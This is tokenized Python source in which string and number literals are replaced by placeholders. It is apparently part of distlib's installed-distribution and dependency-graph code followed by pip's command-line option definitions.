. path . relpath ( path , base ) <EOL> writer . writerow ( ( path , hash_value , size ) ) <EOL> if record_path . startswith ( base ) : <EOL> record_path = os . path . relpath ( record_path , base ) <EOL> writer . writerow ( ( record_path , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return record_path <EOL> def check_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> mismatches = [ ] <EOL> base = os . path . dirname ( self . path ) <EOL> record_path = self . get_distinfo_file ( '<STR_LIT>' ) <EOL> for path , hash_value , size in self . list_installed_files ( ) : <EOL> if not os . path . isabs ( path ) : <EOL> path = os . path . 
join ( base , path ) <EOL> if path == record_path : <EOL> continue <EOL> if not os . path . exists ( path ) : <EOL> mismatches . append ( ( path , '<STR_LIT>' , True , False ) ) <EOL> elif os . path . isfile ( path ) : <EOL> actual_size = str ( os . path . getsize ( path ) ) <EOL> if size and actual_size != size : <EOL> mismatches . append ( ( path , '<STR_LIT:size>' , size , actual_size ) ) <EOL> elif hash_value : <EOL> if '<STR_LIT:=>' in hash_value : <EOL> hasher = hash_value . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> else : <EOL> hasher = None <EOL> with open ( path , '<STR_LIT:rb>' ) as f : <EOL> actual_hash = self . get_hash ( f . read ( ) , hasher ) <EOL> if actual_hash != hash_value : <EOL> mismatches . append ( ( path , '<STR_LIT>' , hash_value , actual_hash ) ) <EOL> return mismatches <EOL> @ cached_property <EOL> def shared_locations ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> shared_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> if os . path . isfile ( shared_path ) : <EOL> with codecs . open ( shared_path , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> lines = f . read ( ) . splitlines ( ) <EOL> for line in lines : <EOL> key , value = line . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> if key == '<STR_LIT>' : <EOL> result . setdefault ( key , [ ] ) . append ( value ) <EOL> else : <EOL> result [ key ] = value <EOL> return result <EOL> def write_shared_locations ( self , paths , dry_run = False ) : <EOL> """<STR_LIT>""" <EOL> shared_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' , shared_path ) <EOL> if dry_run : <EOL> return None <EOL> lines = [ ] <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' ) : <EOL> path = paths [ key ] <EOL> if os . path . isdir ( paths [ key ] ) : <EOL> lines . append ( '<STR_LIT>' % ( key , path ) ) <EOL> for ns in paths . get ( '<STR_LIT>' , ( ) ) : <EOL> lines . 
append ( '<STR_LIT>' % ns ) <EOL> with codecs . open ( shared_path , '<STR_LIT:w>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> f . write ( '<STR_LIT:\n>' . join ( lines ) ) <EOL> return shared_path <EOL> def get_distinfo_resource ( self , path ) : <EOL> if path not in DIST_FILES : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( path , self . path ) ) <EOL> finder = resources . finder_for_path ( self . path ) <EOL> if finder is None : <EOL> raise DistlibException ( '<STR_LIT>' % self . path ) <EOL> return finder . find ( path ) <EOL> def get_distinfo_file ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if path . find ( os . sep ) >= <NUM_LIT:0> : <EOL> distinfo_dirname , path = path . split ( os . sep ) [ - <NUM_LIT:2> : ] <EOL> if distinfo_dirname != self . path . split ( os . sep ) [ - <NUM_LIT:1> ] : <EOL> raise DistlibException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( path , self . name , self . version ) ) <EOL> if path not in DIST_FILES : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( path , self . path ) ) <EOL> return os . path . join ( self . path , path ) <EOL> def list_distinfo_files ( self ) : <EOL> """<STR_LIT>""" <EOL> base = os . path . dirname ( self . path ) <EOL> for path , checksum , size in self . _get_records ( ) : <EOL> if not os . path . isabs ( path ) : <EOL> path = os . path . join ( base , path ) <EOL> if path . startswith ( self . path ) : <EOL> yield path <EOL> def __eq__ ( self , other ) : <EOL> return ( isinstance ( other , InstalledDistribution ) and <EOL> self . path == other . path ) <EOL> __hash__ = object . __hash__ <EOL> class EggInfoDistribution ( BaseInstalledDistribution ) : <EOL> """<STR_LIT>""" <EOL> requested = True <EOL> shared_locations = { } <EOL> def __init__ ( self , path , env = None ) : <EOL> def set_name_and_version ( s , n , v ) : <EOL> s . name = n <EOL> s . key = n . lower ( ) <EOL> s . version = v <EOL> self . path = path <EOL> self . dist_path = env <EOL> if env and env . 
_cache_enabled and path in env . _cache_egg . path : <EOL> metadata = env . _cache_egg . path [ path ] . metadata <EOL> set_name_and_version ( self , metadata . name , metadata . version ) <EOL> else : <EOL> metadata = self . _get_metadata ( path ) <EOL> set_name_and_version ( self , metadata . name , metadata . version ) <EOL> if env and env . _cache_enabled : <EOL> env . _cache_egg . add ( self ) <EOL> super ( EggInfoDistribution , self ) . __init__ ( metadata , path , env ) <EOL> def _get_metadata ( self , path ) : <EOL> requires = None <EOL> def parse_requires_data ( data ) : <EOL> """<STR_LIT>""" <EOL> reqs = [ ] <EOL> lines = data . splitlines ( ) <EOL> for line in lines : <EOL> line = line . strip ( ) <EOL> if line . startswith ( '<STR_LIT:[>' ) : <EOL> logger . warning ( '<STR_LIT>' , <EOL> line ) <EOL> break <EOL> r = parse_requirement ( line ) <EOL> if not r : <EOL> logger . warning ( '<STR_LIT>' , line ) <EOL> continue <EOL> if r . extras : <EOL> logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not r . constraints : <EOL> reqs . append ( r . name ) <EOL> else : <EOL> cons = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % c for c in r . constraints ) <EOL> reqs . append ( '<STR_LIT>' % ( r . name , cons ) ) <EOL> return reqs <EOL> def parse_requires_path ( req_path ) : <EOL> """<STR_LIT>""" <EOL> reqs = [ ] <EOL> try : <EOL> with codecs . open ( req_path , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) as fp : <EOL> reqs = parse_requires_data ( fp . read ( ) ) <EOL> except IOError : <EOL> pass <EOL> return reqs <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> if os . path . isdir ( path ) : <EOL> meta_path = os . path . join ( path , '<STR_LIT>' , '<STR_LIT>' ) <EOL> metadata = Metadata ( path = meta_path , scheme = '<STR_LIT>' ) <EOL> req_path = os . path . join ( path , '<STR_LIT>' , '<STR_LIT>' ) <EOL> requires = parse_requires_path ( req_path ) <EOL> else : <EOL> zipf = zipimport . zipimporter ( path ) <EOL> fileobj = StringIO ( <EOL> zipf . 
get_data ( '<STR_LIT>' ) . decode ( '<STR_LIT:utf8>' ) ) <EOL> metadata = Metadata ( fileobj = fileobj , scheme = '<STR_LIT>' ) <EOL> try : <EOL> data = zipf . get_data ( '<STR_LIT>' ) <EOL> requires = parse_requires_data ( data . decode ( '<STR_LIT:utf-8>' ) ) <EOL> except IOError : <EOL> requires = None <EOL> elif path . endswith ( '<STR_LIT>' ) : <EOL> if os . path . isdir ( path ) : <EOL> req_path = os . path . join ( path , '<STR_LIT>' ) <EOL> requires = parse_requires_path ( req_path ) <EOL> path = os . path . join ( path , '<STR_LIT>' ) <EOL> metadata = Metadata ( path = path , scheme = '<STR_LIT>' ) <EOL> else : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % path ) <EOL> if requires : <EOL> metadata . add_requirements ( requires ) <EOL> return metadata <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . name , self . version , self . path ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . version ) <EOL> def check_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> mismatches = [ ] <EOL> record_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> if os . path . exists ( record_path ) : <EOL> for path , _ , _ in self . list_installed_files ( ) : <EOL> if path == record_path : <EOL> continue <EOL> if not os . path . exists ( path ) : <EOL> mismatches . append ( ( path , '<STR_LIT>' , True , False ) ) <EOL> return mismatches <EOL> def list_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> def _md5 ( path ) : <EOL> f = open ( path , '<STR_LIT:rb>' ) <EOL> try : <EOL> content = f . read ( ) <EOL> finally : <EOL> f . close ( ) <EOL> return hashlib . md5 ( content ) . hexdigest ( ) <EOL> def _size ( path ) : <EOL> return os . stat ( path ) . st_size <EOL> record_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> result = [ ] <EOL> if os . path . exists ( record_path ) : <EOL> with codecs . 
open ( record_path , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> for line in f : <EOL> line = line . strip ( ) <EOL> p = os . path . normpath ( os . path . join ( self . path , line ) ) <EOL> if not os . path . exists ( p ) : <EOL> logger . warning ( '<STR_LIT>' , p ) <EOL> if p . endswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> continue <EOL> if not os . path . isdir ( p ) : <EOL> result . append ( ( p , _md5 ( p ) , _size ( p ) ) ) <EOL> result . append ( ( record_path , None , None ) ) <EOL> return result <EOL> def list_distinfo_files ( self , absolute = False ) : <EOL> """<STR_LIT>""" <EOL> record_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> skip = True <EOL> with codecs . open ( record_path , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> for line in f : <EOL> line = line . strip ( ) <EOL> if line == '<STR_LIT>' : <EOL> skip = False <EOL> continue <EOL> if not skip : <EOL> p = os . path . normpath ( os . path . join ( self . path , line ) ) <EOL> if p . startswith ( self . path ) : <EOL> if absolute : <EOL> yield p <EOL> else : <EOL> yield line <EOL> def __eq__ ( self , other ) : <EOL> return ( isinstance ( other , EggInfoDistribution ) and <EOL> self . path == other . path ) <EOL> __hash__ = object . __hash__ <EOL> new_dist_class = InstalledDistribution <EOL> old_dist_class = EggInfoDistribution <EOL> class DependencyGraph ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . adjacency_list = { } <EOL> self . reverse_list = { } <EOL> self . missing = { } <EOL> def add_distribution ( self , distribution ) : <EOL> """<STR_LIT>""" <EOL> self . adjacency_list [ distribution ] = [ ] <EOL> self . reverse_list [ distribution ] = [ ] <EOL> def add_edge ( self , x , y , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . adjacency_list [ x ] . append ( ( y , label ) ) <EOL> if x not in self . reverse_list [ y ] : <EOL> self . reverse_list [ y ] . 
append ( x ) <EOL> def add_missing ( self , distribution , requirement ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , distribution , requirement ) <EOL> self . missing . setdefault ( distribution , [ ] ) . append ( requirement ) <EOL> def _repr_dist ( self , dist ) : <EOL> return '<STR_LIT>' % ( dist . name , dist . version ) <EOL> def repr_node ( self , dist , level = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> output = [ self . _repr_dist ( dist ) ] <EOL> for other , label in self . adjacency_list [ dist ] : <EOL> dist = self . _repr_dist ( other ) <EOL> if label is not None : <EOL> dist = '<STR_LIT>' % ( dist , label ) <EOL> output . append ( '<STR_LIT:U+0020>' * level + str ( dist ) ) <EOL> suboutput = self . repr_node ( other , level + <NUM_LIT:1> ) <EOL> subs = suboutput . split ( '<STR_LIT:\n>' ) <EOL> output . extend ( subs [ <NUM_LIT:1> : ] ) <EOL> return '<STR_LIT:\n>' . join ( output ) <EOL> def to_dot ( self , f , skip_disconnected = True ) : <EOL> """<STR_LIT>""" <EOL> disconnected = [ ] <EOL> f . write ( "<STR_LIT>" ) <EOL> for dist , adjs in self . adjacency_list . items ( ) : <EOL> if len ( adjs ) == <NUM_LIT:0> and not skip_disconnected : <EOL> disconnected . append ( dist ) <EOL> for other , label in adjs : <EOL> if not label is None : <EOL> f . write ( '<STR_LIT>' % <EOL> ( dist . name , other . name , label ) ) <EOL> else : <EOL> f . write ( '<STR_LIT>' % ( dist . name , other . name ) ) <EOL> if not skip_disconnected and len ( disconnected ) > <NUM_LIT:0> : <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> for dist in disconnected : <EOL> f . write ( '<STR_LIT>' % dist . name ) <EOL> f . write ( '<STR_LIT:\n>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> def topological_sort ( self ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> alist = { } <EOL> for k , v in self . adjacency_list . 
items ( ) : <EOL> alist [ k ] = v [ : ] <EOL> while True : <EOL> to_remove = [ ] <EOL> for k , v in list ( alist . items ( ) ) [ : ] : <EOL> if not v : <EOL> to_remove . append ( k ) <EOL> del alist [ k ] <EOL> if not to_remove : <EOL> break <EOL> for k , v in alist . items ( ) : <EOL> alist [ k ] = [ ( d , r ) for d , r in v if d not in to_remove ] <EOL> logger . debug ( '<STR_LIT>' , <EOL> [ '<STR_LIT>' % ( d . name , d . version ) for d in to_remove ] ) <EOL> result . extend ( to_remove ) <EOL> return result , list ( alist . keys ( ) ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> output = [ ] <EOL> for dist , adjs in self . adjacency_list . items ( ) : <EOL> output . append ( self . repr_node ( dist ) ) <EOL> return '<STR_LIT:\n>' . join ( output ) <EOL> def make_graph ( dists , scheme = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> scheme = get_scheme ( scheme ) <EOL> graph = DependencyGraph ( ) <EOL> provided = { } <EOL> for dist in dists : <EOL> graph . add_distribution ( dist ) <EOL> for p in dist . provides : <EOL> name , version = parse_name_and_version ( p ) <EOL> logger . debug ( '<STR_LIT>' , name , version , dist ) <EOL> provided . setdefault ( name , [ ] ) . append ( ( version , dist ) ) <EOL> for dist in dists : <EOL> requires = ( dist . run_requires | dist . meta_requires | <EOL> dist . build_requires | dist . dev_requires ) <EOL> for req in requires : <EOL> try : <EOL> matcher = scheme . matcher ( req ) <EOL> except UnsupportedVersionError : <EOL> logger . warning ( '<STR_LIT>' , <EOL> req ) <EOL> name = req . split ( ) [ <NUM_LIT:0> ] <EOL> matcher = scheme . matcher ( name ) <EOL> name = matcher . key <EOL> matched = False <EOL> if name in provided : <EOL> for version , provider in provided [ name ] : <EOL> try : <EOL> match = matcher . match ( version ) <EOL> except UnsupportedVersionError : <EOL> match = False <EOL> if match : <EOL> graph . 
add_edge ( dist , provider , req ) <EOL> matched = True <EOL> break <EOL> if not matched : <EOL> graph . add_missing ( dist , req ) <EOL> return graph <EOL> def get_dependent_dists ( dists , dist ) : <EOL> """<STR_LIT>""" <EOL> if dist not in dists : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % dist . name ) <EOL> graph = make_graph ( dists ) <EOL> dep = [ dist ] <EOL> todo = graph . reverse_list [ dist ] <EOL> while todo : <EOL> d = todo . pop ( ) <EOL> dep . append ( d ) <EOL> for succ in graph . reverse_list [ d ] : <EOL> if succ not in dep : <EOL> todo . append ( succ ) <EOL> dep . pop ( <NUM_LIT:0> ) <EOL> return dep <EOL> def get_required_dists ( dists , dist ) : <EOL> """<STR_LIT>""" <EOL> if dist not in dists : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % dist . name ) <EOL> graph = make_graph ( dists ) <EOL> req = [ ] <EOL> todo = graph . adjacency_list [ dist ] <EOL> while todo : <EOL> d = todo . pop ( ) [ <NUM_LIT:0> ] <EOL> req . append ( d ) <EOL> for pred in graph . adjacency_list [ d ] : <EOL> if pred not in req : <EOL> todo . append ( pred ) <EOL> return req <EOL> def make_dist ( name , version , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> summary = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> md = Metadata ( ** kwargs ) <EOL> md . name = name <EOL> md . version = version <EOL> md . summary = summary or '<STR_LIT>' <EOL> return Distribution ( md ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from functools import partial <EOL> from optparse import OptionGroup , SUPPRESS_HELP , Option <EOL> import warnings <EOL> from pip . index import ( <EOL> FormatControl , fmt_ctl_handle_mutual_exclude , fmt_ctl_no_binary , <EOL> fmt_ctl_no_use_wheel ) <EOL> from pip . models import PyPI <EOL> from pip . locations import USER_CACHE_DIR , src_prefix <EOL> from pip . utils . hashes import STRONG_HASHES <EOL> def make_option_group ( group , parser ) : <EOL> """<STR_LIT>""" <EOL> option_group = OptionGroup ( parser , group [ '<STR_LIT:name>' ] ) <EOL> for option in group [ '<STR_LIT>' ] : <EOL> option_group . add_option ( option ( ) ) <EOL> return option_group <EOL> def resolve_wheel_no_use_binary ( options ) : <EOL> if not options . use_wheel : <EOL> control = options . format_control <EOL> fmt_ctl_no_use_wheel ( control ) <EOL> def check_install_build_global ( options , check_options = None ) : <EOL> """<STR_LIT>""" <EOL> if check_options is None : <EOL> check_options = options <EOL> def getname ( n ) : <EOL> return getattr ( check_options , n , None ) <EOL> names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> if any ( map ( getname , names ) ) : <EOL> control = options . format_control <EOL> fmt_ctl_no_binary ( control ) <EOL> warnings . 
warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , stacklevel = <NUM_LIT:2> ) <EOL> help_ = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> isolated_mode = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) , <EOL> ) <EOL> require_virtualenv = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = SUPPRESS_HELP ) <EOL> verbose = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:count>' , <EOL> default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> version = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT:version>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> quiet = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:count>' , <EOL> default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> log = partial ( <EOL> Option , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT:path>" , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> no_input = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = SUPPRESS_HELP ) <EOL> proxy = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> retries = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:int>' , <EOL> default = <NUM_LIT:5> , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> timeout = partial ( <EOL> Option 
, <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:float>' , <EOL> default = <NUM_LIT:15> , <EOL> help = '<STR_LIT>' ) <EOL> default_vcs = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = '<STR_LIT>' , <EOL> help = SUPPRESS_HELP ) <EOL> skip_requirements_regex = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = '<STR_LIT>' , <EOL> help = SUPPRESS_HELP ) <EOL> def exists_action ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:s>' , '<STR_LIT:i>' , '<STR_LIT:w>' , '<STR_LIT:b>' ] , <EOL> default = [ ] , <EOL> action = '<STR_LIT>' , <EOL> metavar = '<STR_LIT:action>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cert = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> metavar = '<STR_LIT:path>' , <EOL> help = "<STR_LIT>" ) <EOL> client_cert = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = None , <EOL> metavar = '<STR_LIT:path>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> index_url = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = PyPI . 
simple_url , <EOL> help = '<STR_LIT>' ) <EOL> def extra_index_url ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> no_index = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> def find_links ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT:url>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def allow_external ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = [ ] , <EOL> metavar = "<STR_LIT>" , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> allow_all_external = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> def trusted_host ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> default = [ ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ) <EOL> no_allow_external = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = False , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> def allow_unsafe ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = [ ] , <EOL> metavar = "<STR_LIT>" , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> no_allow_unsafe = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = False , <EOL> help = SUPPRESS_HELP <EOL> ) <EOL> process_dependency_links = partial ( <EOL> 
Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> def constraints ( ) : <EOL> return Option ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT:file>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def requirements ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT:file>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def editable ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> src = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = src_prefix , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> use_wheel = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = True , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> no_use_wheel = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = True , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> def _get_format_control ( values , option ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( values , option . dest ) <EOL> def _handle_no_binary ( option , opt_str , value , parser ) : <EOL> existing = getattr ( parser . values , option . dest ) <EOL> fmt_ctl_handle_mutual_exclude ( <EOL> value , existing . no_binary , existing . only_binary ) <EOL> def _handle_only_binary ( option , opt_str , value , parser ) : <EOL> existing = getattr ( parser . 
values , option . dest ) <EOL> fmt_ctl_handle_mutual_exclude ( <EOL> value , existing . only_binary , existing . no_binary ) <EOL> def no_binary ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> callback = _handle_no_binary , type = "<STR_LIT:str>" , <EOL> default = FormatControl ( set ( ) , set ( ) ) , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def only_binary ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> callback = _handle_only_binary , type = "<STR_LIT:str>" , <EOL> default = FormatControl ( set ( ) , set ( ) ) , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cache_dir = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = USER_CACHE_DIR , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> no_cache = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> no_deps = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = "<STR_LIT>" ) <EOL> build_dir = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> install_options = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> global_options = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) 
